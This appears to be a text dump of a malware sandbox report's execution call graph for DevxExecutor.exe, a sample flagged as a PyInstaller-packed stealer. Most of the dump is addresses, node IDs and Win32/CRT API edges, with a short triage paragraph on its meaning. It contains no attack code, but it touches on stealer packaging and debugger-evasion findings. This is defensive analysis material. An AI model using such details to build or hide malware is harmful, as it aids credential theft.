20066 7ff6d6eab700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20064->20066 20067 7ff6d6eb1d32 20065->20067 20068 7ff6d6eb1d22 20066->20068 20069 7ff6d6eb1dc7 20067->20069 20070 7ff6d6eb1d3a SetEnvironmentVariableW 20067->20070 20074 7ff6d6eab700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20068->20074 20073 7ff6d6eab6b8 _wfindfirst32i64 17 API calls 20069->20073 20071 7ff6d6eb1d5e 20070->20071 20072 7ff6d6eb1d7f 20070->20072 20075 7ff6d6ea5cb4 _set_fmode 11 API calls 20071->20075 20077 7ff6d6eab700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20072->20077 20076 7ff6d6eb1ddb 20073->20076 20074->20017 20078 7ff6d6eb1d63 20075->20078 20077->20057 20079 7ff6d6eab700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20078->20079 20079->20068 20081 7ff6d6eb1e11 20080->20081 20082 7ff6d6eb1df9 20080->20082 20083 7ff6d6eaf948 _set_fmode 11 API calls 20081->20083 20082->19957 20084 7ff6d6eb1e35 20083->20084 20085 7ff6d6eb1e96 20084->20085 20089 7ff6d6eaf948 _set_fmode 11 API calls 20084->20089 20090 7ff6d6eab700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20084->20090 20091 7ff6d6eab25c __std_exception_copy 37 API calls 20084->20091 20092 7ff6d6eb1ea5 20084->20092 20094 7ff6d6eb1eba 20084->20094 20087 7ff6d6eab700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20085->20087 20086 7ff6d6eab2bc _CreateFrameInfo 45 API calls 20088 7ff6d6eb1ec0 20086->20088 20087->20082 20089->20084 20090->20084 20091->20084 20093 7ff6d6eab6b8 _wfindfirst32i64 17 API calls 20092->20093 20093->20094 20094->20086 20096 7ff6d6eaa484 20095->20096 20097 7ff6d6eaa48d 20095->20097 20096->20097 20210 7ff6d6ea9f4c 20096->20210 20097->19971 20097->19972 20102 7ff6d6eb81e9 20101->20102 20103 7ff6d6eb738c 20101->20103 20105 7ff6d6ea5788 45 API calls 20102->20105 20104 7ff6d6eb7399 20103->20104 20110 7ff6d6eb73cf 20103->20110 20107 7ff6d6ea5cb4 _set_fmode 11 API calls 20104->20107 20125 7ff6d6eb7340 
20104->20125 20106 7ff6d6eb821d 20105->20106 20109 7ff6d6eb8222 20106->20109 20113 7ff6d6eb8233 20106->20113 20118 7ff6d6eb824a 20106->20118 20111 7ff6d6eb73a3 20107->20111 20108 7ff6d6eb73f9 20112 7ff6d6ea5cb4 _set_fmode 11 API calls 20108->20112 20109->19966 20110->20108 20114 7ff6d6eb741e 20110->20114 20115 7ff6d6eab698 _invalid_parameter_noinfo 37 API calls 20111->20115 20116 7ff6d6eb73fe 20112->20116 20119 7ff6d6ea5cb4 _set_fmode 11 API calls 20113->20119 20121 7ff6d6ea5788 45 API calls 20114->20121 20128 7ff6d6eb7409 20114->20128 20120 7ff6d6eb73ae 20115->20120 20117 7ff6d6eab698 _invalid_parameter_noinfo 37 API calls 20116->20117 20117->20128 20123 7ff6d6eb8254 20118->20123 20124 7ff6d6eb8266 20118->20124 20122 7ff6d6eb8238 20119->20122 20120->19966 20121->20128 20129 7ff6d6eab698 _invalid_parameter_noinfo 37 API calls 20122->20129 20130 7ff6d6ea5cb4 _set_fmode 11 API calls 20123->20130 20126 7ff6d6eb828e 20124->20126 20127 7ff6d6eb8277 20124->20127 20125->19966 20442 7ff6d6eba004 20126->20442 20433 7ff6d6eb73dc 20127->20433 20128->19966 20129->20109 20133 7ff6d6eb8259 20130->20133 20135 7ff6d6eab698 _invalid_parameter_noinfo 37 API calls 20133->20135 20135->20109 20136 7ff6d6ea5cb4 _set_fmode 11 API calls 20136->20109 20138 7ff6d6eb424e 20137->20138 20140 7ff6d6eb426b 20137->20140 20139 7ff6d6eb425c 20138->20139 20138->20140 20142 7ff6d6ea5cb4 _set_fmode 11 API calls 20139->20142 20141 7ff6d6eb4275 20140->20141 20482 7ff6d6eb8ce8 20140->20482 20489 7ff6d6eb13ac 20141->20489 20145 7ff6d6eb4261 __scrt_get_show_window_mode 20142->20145 20145->19991 20147 7ff6d6ea5788 45 API calls 20146->20147 20148 7ff6d6eb835a 20147->20148 20149 7ff6d6eb8368 20148->20149 20150 7ff6d6eafbd4 5 API calls 20148->20150 20151 7ff6d6ea5d74 14 API calls 20149->20151 20150->20149 20152 7ff6d6eb83c4 20151->20152 20153 7ff6d6eb8454 20152->20153 20154 7ff6d6ea5788 45 API calls 20152->20154 20155 7ff6d6eb8465 20153->20155 20157 7ff6d6eab700 Concurrency::details::SchedulerProxy::DeleteThis 
11 API calls 20153->20157 20156 7ff6d6eb83d7 20154->20156 20158 7ff6d6eb19fb 20155->20158 20160 7ff6d6eab700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20155->20160 20159 7ff6d6eafbd4 5 API calls 20156->20159 20161 7ff6d6eb83e0 20156->20161 20157->20155 20158->20010 20158->20011 20159->20161 20160->20158 20162 7ff6d6ea5d74 14 API calls 20161->20162 20163 7ff6d6eb843b 20162->20163 20163->20153 20164 7ff6d6eb8443 SetEnvironmentVariableW 20163->20164 20164->20153 20166 7ff6d6eb1f04 20165->20166 20173 7ff6d6eb1ee7 20165->20173 20167 7ff6d6eaf948 _set_fmode 11 API calls 20166->20167 20168 7ff6d6eb1f28 20167->20168 20169 7ff6d6eb1f89 20168->20169 20174 7ff6d6eaf948 _set_fmode 11 API calls 20168->20174 20175 7ff6d6eab700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20168->20175 20176 7ff6d6eb1344 _wfindfirst32i64 37 API calls 20168->20176 20177 7ff6d6eb1f98 20168->20177 20179 7ff6d6eb1fac 20168->20179 20172 7ff6d6eab700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20169->20172 20170 7ff6d6eab2bc _CreateFrameInfo 45 API calls 20171 7ff6d6eb1fb2 20170->20171 20172->20173 20173->20023 20174->20168 20175->20168 20176->20168 20178 7ff6d6eab6b8 _wfindfirst32i64 17 API calls 20177->20178 20178->20179 20179->20170 20181 7ff6d6eaa4c0 20180->20181 20184 7ff6d6eaa4c9 20180->20184 20181->20184 20501 7ff6d6ea9fc0 20181->20501 20184->20038 20184->20039 20187 7ff6d6eb80a9 20186->20187 20191 7ff6d6eb80d6 20186->20191 20188 7ff6d6eb80ae 20187->20188 20187->20191 20189 7ff6d6ea5cb4 _set_fmode 11 API calls 20188->20189 20190 7ff6d6eb80b3 20189->20190 20193 7ff6d6eab698 _invalid_parameter_noinfo 37 API calls 20190->20193 20192 7ff6d6eb811a 20191->20192 20194 7ff6d6eb8139 20191->20194 20206 7ff6d6eb810e __crtLCMapStringW 20191->20206 20195 7ff6d6ea5cb4 _set_fmode 11 API calls 20192->20195 20196 7ff6d6eb80be 20193->20196 20197 7ff6d6eb8155 20194->20197 20198 7ff6d6eb8143 20194->20198 20199 7ff6d6eb811f 20195->20199 20196->20036 20201 
7ff6d6ea5788 45 API calls 20197->20201 20200 7ff6d6ea5cb4 _set_fmode 11 API calls 20198->20200 20202 7ff6d6eab698 _invalid_parameter_noinfo 37 API calls 20199->20202 20203 7ff6d6eb8148 20200->20203 20204 7ff6d6eb8162 20201->20204 20202->20206 20205 7ff6d6eab698 _invalid_parameter_noinfo 37 API calls 20203->20205 20204->20206 20548 7ff6d6eb9bc0 20204->20548 20205->20206 20206->20036 20209 7ff6d6ea5cb4 _set_fmode 11 API calls 20209->20206 20211 7ff6d6ea9f65 20210->20211 20212 7ff6d6ea9f61 20210->20212 20233 7ff6d6eb3440 20211->20233 20212->20097 20225 7ff6d6eaa2a0 20212->20225 20217 7ff6d6ea9f83 20259 7ff6d6eaa030 20217->20259 20218 7ff6d6ea9f77 20219 7ff6d6eab700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20218->20219 20219->20212 20222 7ff6d6eab700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20223 7ff6d6ea9faa 20222->20223 20224 7ff6d6eab700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20223->20224 20224->20212 20226 7ff6d6eaa2c9 20225->20226 20229 7ff6d6eaa2e2 20225->20229 20226->20097 20227 7ff6d6eb1640 WideCharToMultiByte 20227->20229 20228 7ff6d6eaf948 _set_fmode 11 API calls 20228->20229 20229->20226 20229->20227 20229->20228 20230 7ff6d6eaa372 20229->20230 20232 7ff6d6eab700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20229->20232 20231 7ff6d6eab700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20230->20231 20231->20226 20232->20229 20234 7ff6d6ea9f6a 20233->20234 20235 7ff6d6eb344d 20233->20235 20239 7ff6d6eb377c GetEnvironmentStringsW 20234->20239 20278 7ff6d6eabfd4 20235->20278 20240 7ff6d6ea9f6f 20239->20240 20241 7ff6d6eb37ac 20239->20241 20240->20217 20240->20218 20242 7ff6d6eb1640 WideCharToMultiByte 20241->20242 20243 7ff6d6eb37fd 20242->20243 20244 7ff6d6eb3804 FreeEnvironmentStringsW 20243->20244 20245 7ff6d6eae3ac _fread_nolock 12 API calls 20243->20245 20244->20240 20246 7ff6d6eb3817 20245->20246 20247 7ff6d6eb381f 20246->20247 20248 7ff6d6eb3828 20246->20248 
20249 7ff6d6eab700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20247->20249 20250 7ff6d6eb1640 WideCharToMultiByte 20248->20250 20251 7ff6d6eb3826 20249->20251 20252 7ff6d6eb384b 20250->20252 20251->20244 20253 7ff6d6eb384f 20252->20253 20254 7ff6d6eb3859 20252->20254 20256 7ff6d6eab700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20253->20256 20255 7ff6d6eab700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20254->20255 20257 7ff6d6eb3857 FreeEnvironmentStringsW 20255->20257 20256->20257 20257->20240 20260 7ff6d6eaa055 20259->20260 20261 7ff6d6eaf948 _set_fmode 11 API calls 20260->20261 20272 7ff6d6eaa08b 20261->20272 20262 7ff6d6eaa093 20263 7ff6d6eab700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20262->20263 20264 7ff6d6ea9f8b 20263->20264 20264->20222 20265 7ff6d6eaa106 20266 7ff6d6eab700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20265->20266 20266->20264 20267 7ff6d6eaf948 _set_fmode 11 API calls 20267->20272 20268 7ff6d6eaa0f5 20427 7ff6d6eaa25c 20268->20427 20269 7ff6d6eab25c __std_exception_copy 37 API calls 20269->20272 20272->20262 20272->20265 20272->20267 20272->20268 20272->20269 20273 7ff6d6eaa12b 20272->20273 20276 7ff6d6eab700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20272->20276 20275 7ff6d6eab6b8 _wfindfirst32i64 17 API calls 20273->20275 20274 7ff6d6eab700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20274->20262 20277 7ff6d6eaa13e 20275->20277 20276->20272 20279 7ff6d6eac000 FlsSetValue 20278->20279 20280 7ff6d6eabfe5 FlsGetValue 20278->20280 20281 7ff6d6eabff2 20279->20281 20283 7ff6d6eac00d 20279->20283 20280->20281 20282 7ff6d6eabffa 20280->20282 20285 7ff6d6eabff8 20281->20285 20286 7ff6d6eab2bc _CreateFrameInfo 45 API calls 20281->20286 20282->20279 20284 7ff6d6eaf948 _set_fmode 11 API calls 20283->20284 20287 7ff6d6eac01c 20284->20287 20298 7ff6d6eb3114 20285->20298 20288 7ff6d6eac075 20286->20288 20289 
7ff6d6eac03a FlsSetValue 20287->20289 20290 7ff6d6eac02a FlsSetValue 20287->20290 20292 7ff6d6eac058 20289->20292 20293 7ff6d6eac046 FlsSetValue 20289->20293 20291 7ff6d6eac033 20290->20291 20294 7ff6d6eab700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20291->20294 20295 7ff6d6eabcac _set_fmode 11 API calls 20292->20295 20293->20291 20294->20281 20296 7ff6d6eac060 20295->20296 20297 7ff6d6eab700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20296->20297 20297->20285 20321 7ff6d6eb3384 20298->20321 20300 7ff6d6eb3149 20336 7ff6d6eb2e14 20300->20336 20303 7ff6d6eb3166 20303->20234 20304 7ff6d6eae3ac _fread_nolock 12 API calls 20305 7ff6d6eb3177 20304->20305 20306 7ff6d6eb317f 20305->20306 20308 7ff6d6eb318e 20305->20308 20307 7ff6d6eab700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20306->20307 20307->20303 20308->20308 20343 7ff6d6eb34bc 20308->20343 20311 7ff6d6eb328a 20312 7ff6d6ea5cb4 _set_fmode 11 API calls 20311->20312 20313 7ff6d6eb328f 20312->20313 20316 7ff6d6eab700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20313->20316 20314 7ff6d6eb32e5 20315 7ff6d6eb334c 20314->20315 20354 7ff6d6eb2c44 20314->20354 20320 7ff6d6eab700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20315->20320 20316->20303 20317 7ff6d6eb32a4 20317->20314 20318 7ff6d6eab700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20317->20318 20318->20314 20320->20303 20322 7ff6d6eb33a7 20321->20322 20323 7ff6d6eb33b1 20322->20323 20369 7ff6d6eb11a8 EnterCriticalSection 20322->20369 20325 7ff6d6eb3423 20323->20325 20328 7ff6d6eab2bc _CreateFrameInfo 45 API calls 20323->20328 20325->20300 20330 7ff6d6eb343b 20328->20330 20332 7ff6d6eabfd4 50 API calls 20330->20332 20335 7ff6d6eb3492 20330->20335 20333 7ff6d6eb347c 20332->20333 20334 7ff6d6eb3114 65 API calls 20333->20334 20334->20335 20335->20300 20337 7ff6d6ea5788 45 API calls 20336->20337 20338 7ff6d6eb2e28 20337->20338 20339 7ff6d6eb2e34 GetOEMCP 
20338->20339 20340 7ff6d6eb2e46 20338->20340 20341 7ff6d6eb2e5b 20339->20341 20340->20341 20342 7ff6d6eb2e4b GetACP 20340->20342 20341->20303 20341->20304 20342->20341 20344 7ff6d6eb2e14 47 API calls 20343->20344 20346 7ff6d6eb34e9 20344->20346 20345 7ff6d6eb363f 20347 7ff6d6e9c010 _wfindfirst32i64 8 API calls 20345->20347 20346->20345 20348 7ff6d6eb3526 IsValidCodePage 20346->20348 20353 7ff6d6eb3540 __scrt_get_show_window_mode 20346->20353 20349 7ff6d6eb3281 20347->20349 20348->20345 20350 7ff6d6eb3537 20348->20350 20349->20311 20349->20317 20351 7ff6d6eb3566 GetCPInfo 20350->20351 20350->20353 20351->20345 20351->20353 20370 7ff6d6eb2f2c 20353->20370 20426 7ff6d6eb11a8 EnterCriticalSection 20354->20426 20371 7ff6d6eb2f69 GetCPInfo 20370->20371 20372 7ff6d6eb305f 20370->20372 20371->20372 20377 7ff6d6eb2f7c 20371->20377 20373 7ff6d6e9c010 _wfindfirst32i64 8 API calls 20372->20373 20374 7ff6d6eb30fe 20373->20374 20374->20345 20375 7ff6d6eb3c90 48 API calls 20376 7ff6d6eb2ff3 20375->20376 20381 7ff6d6eb8c34 20376->20381 20377->20375 20380 7ff6d6eb8c34 54 API calls 20380->20372 20382 7ff6d6ea5788 45 API calls 20381->20382 20383 7ff6d6eb8c59 20382->20383 20386 7ff6d6eb8900 20383->20386 20387 7ff6d6eb8941 20386->20387 20388 7ff6d6eb03f0 _fread_nolock MultiByteToWideChar 20387->20388 20392 7ff6d6eb898b 20388->20392 20389 7ff6d6eb8c09 20391 7ff6d6e9c010 _wfindfirst32i64 8 API calls 20389->20391 20390 7ff6d6eb8ac1 20390->20389 20395 7ff6d6eab700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20390->20395 20393 7ff6d6eb3026 20391->20393 20392->20389 20392->20390 20394 7ff6d6eae3ac _fread_nolock 12 API calls 20392->20394 20396 7ff6d6eb89c3 20392->20396 20393->20380 20394->20396 20395->20389 20396->20390 20397 7ff6d6eb03f0 _fread_nolock MultiByteToWideChar 20396->20397 20398 7ff6d6eb8a36 20397->20398 20398->20390 20417 7ff6d6eafd94 20398->20417 20401 7ff6d6eb8a81 20401->20390 20404 7ff6d6eafd94 __crtLCMapStringW 6 API calls 20401->20404 20402 7ff6d6eb8ad2 
Execution Graph (interactive widget residue, this fragment only): Joe Sandbox's call-graph viewer for the native code of DevxExecutor.exe, emitted here as bare node IDs, function addresses (0x7ff6d6e91000 to 0x7ff6d6ebbe14, so one image base) and "from->to" edge pairs. The edge list itself carries no analysis value in text form; the recoverable content is the set of functions and Win32 APIs the graph names.
Named CRT internals: _wfindfirst32i64, __crtLCMapStringW, _set_fmode, _invalid_parameter_noinfo, _fread_nolock, memcpy_s, _isindst, _CreateFrameInfo, __std_exception_copy, __scrt_acquire_startup_lock, __scrt_release_startup_lock, __scrt_dllmain_crt_thread_attach, __scrt_get_show_window_mode, __vcrt_InitializeCriticalSectionEx, _RTC_Initialize, Concurrency::details::SchedulerProxy::DeleteThis.
Win32 APIs reached: GetModuleFileNameW, GetModuleHandleW, GetStartupInfoW, SetDllDirectoryW, LoadLibraryExW, GetProcAddress, FreeLibrary, GetEnvironmentStringsW, FreeEnvironmentStringsW, GetEnvironmentVariableW, ExpandEnvironmentStringsW, SetEnvironmentVariableW, FindFirstFileExW, FileTimeToSystemTime, SystemTimeToTzSpecificLocalTime, GetCurrentProcess, OpenProcessToken, PostMessageW, GetMessageW, MessageBoxA, MessageBoxW, FormatMessageW, LocalFree, FlsGetValue, FlsSetValue, TlsFree, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeSListHead, RtlAllocateHeap, HeapReAlloc, HeapSize, LCMapStringW, CompareStringW, GetCPInfo, MultiByteToWideChar, WideCharToMultiByte, GetLastError, SetLastError, IsProcessorFeaturePresent, RtlRestoreThreadPreferredUILanguages.
Caveat for triage: the IsDebuggerPresent node in this fragment sits in the sequence RtlCaptureContext -> RtlLookupFunctionEntry -> RtlVirtualUnwind -> IsDebuggerPresent -> SetUnhandledExceptionFilter -> UnhandledExceptionFilter -> GetCurrentProcess -> TerminateProcess, which is the MSVC CRT fail-fast handler (the __raise_securityfailure path behind /GS and range-check failures), not an anti-debugging check written by the malware author. The "Hides threads from debuggers" and "direct / indirect Syscall" findings in the Signatures section come from other behaviour, not from this native call graph. The surrounding SetDllDirectoryW, GetModuleFileNameW, environment-variable and MessageBox error-reporting paths are consistent with the PyInstaller bootloader the report flags ("Found pyInstaller with non standard icon"); the stealer logic itself lives in the bundled Python payload, not in these CRT and bootloader functions.
17120->17058 17121->17114 17124 7ff6d6eaf4fa 17121->17124 17122->17120 17136 7ff6d6eab25c 17122->17136 17124->17117 17124->17119 17127 7ff6d6eab6b8 _wfindfirst32i64 17 API calls 17128 7ff6d6eaf604 17127->17128 17130 7ff6d6eae3f7 17129->17130 17134 7ff6d6eae3bb _set_fmode 17129->17134 17132 7ff6d6ea5cb4 _set_fmode 11 API calls 17130->17132 17131 7ff6d6eae3de RtlAllocateHeap 17133 7ff6d6ea1514 17131->17133 17131->17134 17132->17133 17133->17104 17133->17106 17134->17130 17134->17131 17135 7ff6d6eb43e0 _set_fmode 2 API calls 17134->17135 17135->17134 17137 7ff6d6eab269 17136->17137 17139 7ff6d6eab273 17136->17139 17137->17139 17143 7ff6d6eab28e 17137->17143 17138 7ff6d6ea5cb4 _set_fmode 11 API calls 17140 7ff6d6eab27a 17138->17140 17139->17138 17141 7ff6d6eab698 _invalid_parameter_noinfo 37 API calls 17140->17141 17142 7ff6d6eab286 17141->17142 17142->17120 17142->17127 17143->17142 17144 7ff6d6ea5cb4 _set_fmode 11 API calls 17143->17144 17144->17140 17178 7ff6d6eb4efc 17145->17178 17149 7ff6d6eaf15c 17150 7ff6d6eaf1b1 17149->17150 17152 7ff6d6eaf17c 17149->17152 17154 7ff6d6eaf160 17149->17154 17231 7ff6d6eaeca0 17150->17231 17227 7ff6d6eaef5c 17152->17227 17154->17120 17156 7ff6d6eb4efc 38 API calls 17155->17156 17157 7ff6d6eaeece 17156->17157 17158 7ff6d6eb4944 37 API calls 17157->17158 17159 7ff6d6eaef1e 17158->17159 17160 7ff6d6eaef22 17159->17160 17161 7ff6d6eaef5c 45 API calls 17159->17161 17160->17120 17161->17160 17163 7ff6d6eb4efc 38 API calls 17162->17163 17164 7ff6d6eaebef 17163->17164 17165 7ff6d6eb4944 37 API calls 17164->17165 17166 7ff6d6eaec47 17165->17166 17167 7ff6d6eaec4b 17166->17167 17168 7ff6d6eaeca0 45 API calls 17166->17168 17167->17120 17168->17167 17170 7ff6d6eae851 17169->17170 17171 7ff6d6eae884 17169->17171 17173 7ff6d6eab5cc _invalid_parameter_noinfo 37 API calls 17170->17173 17172 7ff6d6eae89c 17171->17172 17175 7ff6d6eae91d 17171->17175 17174 7ff6d6eaeba4 46 API calls 17172->17174 17177 7ff6d6eae87d __scrt_get_show_window_mode 
17173->17177 17174->17177 17176 7ff6d6ea50f0 45 API calls 17175->17176 17175->17177 17176->17177 17177->17120 17179 7ff6d6eb4f4f fegetenv 17178->17179 17180 7ff6d6eb8e5c 37 API calls 17179->17180 17186 7ff6d6eb4fa2 17180->17186 17181 7ff6d6eb4fcf 17185 7ff6d6eab25c __std_exception_copy 37 API calls 17181->17185 17182 7ff6d6eb5092 17183 7ff6d6eb8e5c 37 API calls 17182->17183 17184 7ff6d6eb50bc 17183->17184 17189 7ff6d6eb8e5c 37 API calls 17184->17189 17190 7ff6d6eb504d 17185->17190 17186->17182 17187 7ff6d6eb4fbd 17186->17187 17188 7ff6d6eb506c 17186->17188 17187->17181 17187->17182 17193 7ff6d6eab25c __std_exception_copy 37 API calls 17188->17193 17191 7ff6d6eb50cd 17189->17191 17192 7ff6d6eb6174 17190->17192 17197 7ff6d6eb5055 17190->17197 17194 7ff6d6eb9050 20 API calls 17191->17194 17195 7ff6d6eab6b8 _wfindfirst32i64 17 API calls 17192->17195 17193->17190 17205 7ff6d6eb5136 __scrt_get_show_window_mode 17194->17205 17196 7ff6d6eb6189 17195->17196 17198 7ff6d6e9c010 _wfindfirst32i64 8 API calls 17197->17198 17199 7ff6d6eaf101 17198->17199 17223 7ff6d6eb4944 17199->17223 17200 7ff6d6eb54df __scrt_get_show_window_mode 17201 7ff6d6eb581f 17202 7ff6d6eb4a60 37 API calls 17201->17202 17207 7ff6d6eb5f37 17202->17207 17203 7ff6d6eb5177 memcpy_s 17216 7ff6d6eb5abb memcpy_s __scrt_get_show_window_mode 17203->17216 17218 7ff6d6eb55d3 memcpy_s __scrt_get_show_window_mode 17203->17218 17204 7ff6d6eb57cb 17204->17201 17204->17204 17206 7ff6d6eb618c memcpy_s 37 API calls 17204->17206 17205->17200 17205->17203 17208 7ff6d6ea5cb4 _set_fmode 11 API calls 17205->17208 17206->17201 17207->17207 17212 7ff6d6eb618c memcpy_s 37 API calls 17207->17212 17221 7ff6d6eb5f92 17207->17221 17210 7ff6d6eb55b0 17208->17210 17209 7ff6d6eb6118 17213 7ff6d6eb8e5c 37 API calls 17209->17213 17211 7ff6d6eab698 _invalid_parameter_noinfo 37 API calls 17210->17211 17211->17203 17212->17221 17213->17197 17214 7ff6d6ea5cb4 11 API calls _set_fmode 17214->17216 17215 7ff6d6ea5cb4 11 API calls _set_fmode 
17215->17218 17216->17201 17216->17204 17216->17214 17222 7ff6d6eab698 37 API calls _invalid_parameter_noinfo 17216->17222 17217 7ff6d6eab698 37 API calls _invalid_parameter_noinfo 17217->17218 17218->17204 17218->17215 17218->17217 17219 7ff6d6eb4a60 37 API calls 17219->17221 17220 7ff6d6eb618c memcpy_s 37 API calls 17220->17221 17221->17209 17221->17219 17221->17220 17222->17216 17224 7ff6d6eb4963 17223->17224 17225 7ff6d6eab5cc _invalid_parameter_noinfo 37 API calls 17224->17225 17226 7ff6d6eb498e memcpy_s 17224->17226 17225->17226 17226->17149 17228 7ff6d6eaef88 memcpy_s 17227->17228 17229 7ff6d6ea50f0 45 API calls 17228->17229 17230 7ff6d6eaf042 memcpy_s __scrt_get_show_window_mode 17228->17230 17229->17230 17230->17154 17232 7ff6d6eaecdb 17231->17232 17235 7ff6d6eaed28 memcpy_s 17231->17235 17233 7ff6d6eab5cc _invalid_parameter_noinfo 37 API calls 17232->17233 17234 7ff6d6eaed07 17233->17234 17234->17154 17236 7ff6d6eaed93 17235->17236 17238 7ff6d6ea50f0 45 API calls 17235->17238 17237 7ff6d6eab25c __std_exception_copy 37 API calls 17236->17237 17241 7ff6d6eaedd5 memcpy_s 17237->17241 17238->17236 17239 7ff6d6eab6b8 _wfindfirst32i64 17 API calls 17240 7ff6d6eaee80 17239->17240 17241->17239 17244 7ff6d6eb1664 WideCharToMultiByte 17242->17244 17246 7ff6d6ea1671 17245->17246 17247 7ff6d6ea1683 17245->17247 17248 7ff6d6ea5cb4 _set_fmode 11 API calls 17246->17248 17249 7ff6d6ea1690 17247->17249 17253 7ff6d6ea16cd 17247->17253 17250 7ff6d6ea1676 17248->17250 17252 7ff6d6eab5cc _invalid_parameter_noinfo 37 API calls 17249->17252 17251 7ff6d6eab698 _invalid_parameter_noinfo 37 API calls 17250->17251 17257 7ff6d6ea1681 17251->17257 17252->17257 17254 7ff6d6ea1776 17253->17254 17255 7ff6d6ea5cb4 _set_fmode 11 API calls 17253->17255 17256 7ff6d6ea5cb4 _set_fmode 11 API calls 17254->17256 17254->17257 17258 7ff6d6ea176b 17255->17258 17259 7ff6d6ea1820 17256->17259 17257->16974 17260 7ff6d6eab698 _invalid_parameter_noinfo 37 API calls 17258->17260 17261 7ff6d6eab698 
_invalid_parameter_noinfo 37 API calls 17259->17261 17260->17254 17261->17257 17263 7ff6d6eae781 17262->17263 17265 7ff6d6ea512f 17262->17265 17263->17265 17270 7ff6d6eb4154 17263->17270 17266 7ff6d6eae7d4 17265->17266 17267 7ff6d6ea513f 17266->17267 17268 7ff6d6eae7ed 17266->17268 17267->16974 17268->17267 17283 7ff6d6eb34a0 17268->17283 17271 7ff6d6eabf00 _CreateFrameInfo 45 API calls 17270->17271 17272 7ff6d6eb4163 17271->17272 17273 7ff6d6eb41ae 17272->17273 17282 7ff6d6eb11a8 EnterCriticalSection 17272->17282 17273->17265 17284 7ff6d6eabf00 _CreateFrameInfo 45 API calls 17283->17284 17285 7ff6d6eb34a9 17284->17285 17293 7ff6d6ea5b5c EnterCriticalSection 17286->17293 17295 7ff6d6e9288c 17294->17295 17296 7ff6d6ea52b4 49 API calls 17295->17296 17297 7ff6d6e928dd 17296->17297 17298 7ff6d6ea5cb4 _set_fmode 11 API calls 17297->17298 17299 7ff6d6e928e2 17298->17299 17313 7ff6d6ea5cd4 17299->17313 17302 7ff6d6e91ee0 49 API calls 17303 7ff6d6e92911 __scrt_get_show_window_mode 17302->17303 17304 7ff6d6e98de0 57 API calls 17303->17304 17305 7ff6d6e92946 17304->17305 17306 7ff6d6e92983 MessageBoxA 17305->17306 17307 7ff6d6e9294b 17305->17307 17308 7ff6d6e9299d 17306->17308 17309 7ff6d6e98de0 57 API calls 17307->17309 17310 7ff6d6e9c010 _wfindfirst32i64 8 API calls 17308->17310 17311 7ff6d6e92965 MessageBoxW 17309->17311 17312 7ff6d6e929ad 17310->17312 17311->17308 17312->16640 17314 7ff6d6eac078 _set_fmode 11 API calls 17313->17314 17315 7ff6d6ea5ceb 17314->17315 17316 7ff6d6e928e9 17315->17316 17317 7ff6d6eaf948 _set_fmode 11 API calls 17315->17317 17320 7ff6d6ea5d2b 17315->17320 17316->17302 17318 7ff6d6ea5d20 17317->17318 17319 7ff6d6eab700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17318->17319 17319->17320 17320->17316 17325 7ff6d6eb0018 17320->17325 17323 7ff6d6eab6b8 _wfindfirst32i64 17 API calls 17324 7ff6d6ea5d70 17323->17324 17329 7ff6d6eb0035 17325->17329 17326 7ff6d6eb003a 17327 7ff6d6ea5d51 17326->17327 17328 7ff6d6ea5cb4 _set_fmode 11 API 
calls 17326->17328 17327->17316 17327->17323 17330 7ff6d6eb0044 17328->17330 17329->17326 17329->17327 17332 7ff6d6eb0084 17329->17332 17331 7ff6d6eab698 _invalid_parameter_noinfo 37 API calls 17330->17331 17331->17327 17332->17327 17333 7ff6d6ea5cb4 _set_fmode 11 API calls 17332->17333 17333->17330 17335 7ff6d6e98f82 WideCharToMultiByte 17334->17335 17336 7ff6d6e98f14 WideCharToMultiByte 17334->17336 17337 7ff6d6e98faf 17335->17337 17341 7ff6d6e93f6b 17335->17341 17338 7ff6d6e98f3e 17336->17338 17342 7ff6d6e98f55 17336->17342 17340 7ff6d6e929c0 57 API calls 17337->17340 17339 7ff6d6e929c0 57 API calls 17338->17339 17339->17341 17340->17341 17341->16650 17341->16651 17342->17335 17343 7ff6d6e98f6b 17342->17343 17344 7ff6d6e929c0 57 API calls 17343->17344 17344->17341 17346 7ff6d6e940ea 17345->17346 17347 7ff6d6e98de0 57 API calls 17346->17347 17348 7ff6d6e94112 17347->17348 17363 7ff6d6e98d00 FindFirstFileExW 17348->17363 17351 7ff6d6e9c010 _wfindfirst32i64 8 API calls 17352 7ff6d6e93f88 17351->17352 17352->16655 17352->16658 17354 7ff6d6e94352 17353->17354 17355 7ff6d6e98de0 57 API calls 17354->17355 17356 7ff6d6e94380 CreateFileW 17355->17356 17357 7ff6d6e943b7 GetFinalPathNameByHandleW CloseHandle 17356->17357 17358 7ff6d6e9441f 17356->17358 17357->17358 17359 7ff6d6e943e3 __vcrt_InitializeCriticalSectionEx 17357->17359 17360 7ff6d6e9c010 _wfindfirst32i64 8 API calls 17358->17360 17361 7ff6d6e98ef0 59 API calls 17359->17361 17362 7ff6d6e93fb9 17360->17362 